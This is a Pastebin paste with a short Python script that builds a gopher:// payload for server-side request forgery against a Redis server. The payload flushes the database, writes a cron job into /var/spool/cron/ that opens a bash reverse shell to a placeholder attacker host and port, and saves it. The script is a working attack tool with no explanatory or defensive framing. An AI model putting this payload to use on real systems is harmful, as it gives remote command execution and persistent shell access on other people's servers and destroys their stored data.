Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import urllib.parse
- reverse_host = "<YOUR_REVERSE_HOST>"
- reverse_port = "<YOUR_REVERSE_PORT>"
- protocol = "gopher://"
- ip = "<REDIS_HOST>"
- port = "<REDIS_PORT>"
- shell = "\n\n*/1 * * * * bash -i >& /dev/tcp/{}/{} 0>&1\n\n".format(reverse_host, reverse_port)
- path = "/var/spool/cron/"
- filename = "<REDIS_SERVICE_USER>"
- passwd = ""
- cmds = [
- "flushall",
- "set 1 {}".format(shell.replace(" ","${IFS}")),
- "config set dir {}".format(path),
- "config set dbfilename {}".format(filename),
- "save",
- 'quit'
- ]
- if passwd:
- cmd.insert(0,"AUTH {}".format(passwd))
- payload = "{}{}:{}/_".format(protocol, ip, port)
- def cmd2redis(arr):
- CRLF = "\r\n"
- redis_arr = arr.split(" ")
- cmd = "*" + str(len(redis_arr))
- for token in redis_arr:
- cmd += CRLF + "$" + str(len(token.replace("${IFS}"," "))) + CRLF + token.replace("${IFS}"," ")
- cmd += CRLF
- return cmd
- if __name__=="__main__":
- print("=" * 100)
- for cmd in cmds:
- print(cmd2redis(cmd))
- payload += urllib.parse.quote(cmd2redis(cmd))
- print("=" * 100)
- print(payload)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement